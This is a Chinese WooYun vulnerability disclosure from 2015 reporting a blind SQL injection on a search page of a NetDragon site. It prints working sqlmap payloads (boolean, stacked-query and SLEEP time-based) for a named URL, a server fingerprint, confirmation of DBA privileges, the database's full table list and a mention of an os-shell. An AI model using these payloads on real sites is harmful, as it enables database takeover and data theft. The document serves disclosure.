当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0117469

漏洞标题:福建网龙某站SQL盲注影响核心数据DBA权限

相关厂商:福建网龙

漏洞作者: 路人甲

提交时间:2015-06-01 11:41

修复时间:2015-07-16 20:08

公开时间:2015-07-16 20:08

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-01: 细节已通知厂商并且等待厂商处理中
2015-06-01: 厂商已经确认,细节仅向厂商公开
2015-06-11: 细节向核心白帽子及相关领域专家公开
2015-06-21: 细节向普通白帽子公开
2015-07-01: 细节向实习白帽子公开
2015-07-16: 细节向公众公开

简要描述:

233

详细说明:

http://www.ln86e.com/Shequ/Search.aspx?page=1&SearchTxt=1&tag=1 搜索关键字

漏洞证明:

---
Parameter: SearchTxt (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: page=1&SearchTxt=-2599' OR 9566=9566 AND 'Sdri' LIKE 'Sdri&tag=1
    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
    Payload: page=1&SearchTxt=1';(SELECT * FROM (SELECT(SLEEP(5)))ZcZJ)#&tag=1
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: page=1&SearchTxt=1' AND (SELECT * FROM (SELECT(SLEEP(5)))bKfN) AND 'ihhG' LIKE 'ihhG&tag=1
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: MySQL 5.0.11
current user is DBA:    True
Database: ln_zsxx
[126 tables]
+----------------------------+
| user                       |
| accounts_department        |
| accounts_rolepermissions   |
| accounts_roles             |
| accounts_userroles         |
| accounts_users             |
| admobile                   |
| advertisement              |
| agednesscommunity          |
| agednesscommunityclass     |
| b_cataloglist              |
| b_cataloglist1115bak       |
| b_curlesson                |
| b_favorites                |
| b_lessionmessage           |
| b_lesson                   |
| b_lesson1115bak            |
| b_lesson_jxjy              |
| b_lesson_ncjy              |
| b_lesson_recm              |
| b_lesson_woman             |
| b_lessonappraise           |
| b_lessoncount              |
| b_lessoncount0619bak       |
| b_lessongroup              |
| b_lessonjoin               |
| b_lessonnote               |
| b_lessonnote_ding          |
| b_lessonnotefavorites      |
| b_lessonnoterecommend      |
| b_lessonnotereply          |
| b_lessontimecount          |
| b_lessontimecount_copy     |
| b_lessontimecountitem      |
| b_lessontimecountitem_copy |
| b_lessontimehistory        |
| b_lessontype               |
| b_news                     |
| b_newsclass                |
| b_package                  |
| b_package1115bak           |
| b_packagelist              |
| b_photo                    |
| b_recommend                |
| b_studytask                |
| b_teacherforum             |
| b_videolist                |
| b_videolist1115bak         |
| b_videopackage             |
| b_viewvideo                |
| b_viewvideo_debug          |
| b_viewvideorec             |
| blogroll                   |
| copyright                  |
| event_category             |
| event_data                 |
| event_photo                |
| event_video                |
| getpwds                    |
| mpsysmsg                   |
| mpsysmsgread               |
| new_table_name             |
| nonacademic                |
| nonacademicdetail          |
| onlinecount                |
| onlinelist                 |
| packageidtounitid          |
| packageidtounitidbyname    |
| rankcity                   |
| rankles                    |
| s_dictionary               |
| s_tree                     |
| shequ_advertisement        |
| shequ_area                 |
| shequ_city                 |
| shequ_data                 |
| shequ_forum                |
| shequ_lesson               |
| shequ_news                 |
| shequ_newsclass            |
| shequ_user                 |
| shequ_user_visit           |
| shequ_volunteer            |
| site                       |
| sitetotal                  |
| starlevel                  |
| starleveltop               |
| system_log                 |
| t_advertisement            |
| t_app_version              |
| t_category                 |
| t_comment                  |
| t_credit_admin_log         |
| t_credit_log               |
| t_digglog                  |
| t_feedback                 |
| t_hotsearch                |
| t_lesson                   |
| t_lesson_appraise          |
| t_lesson_collect           |
| t_lesson_command           |
| t_menu                     |
| t_rolemenus                |
| t_roles                    |
| t_slogan                   |
| t_syslog                   |
| t_systemlog                |
| t_systemuser               |
| t_sysuser                  |
| t_user_creditrule          |
| t_user_level               |
| t_user_video               |
| t_userroles                |
| user_count                 |
| user_follow                |
| user_follow_message        |
| user_sys_message           |
| user_sys_message_status    |
| user_tblog                 |
| user_tblog_comment         |
| userstat                   |
| userstatcount              |
| userstatlogincount         |
| x_config                   |
| x_log                      |
| x_online                   |
+----------------------------+

os-shell

修复方案:

~

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-06-01 20:07

厂商回复:

感谢 路人甲 提供的漏洞,安排修复中

最新状态:

暂无

漏洞评价:

评论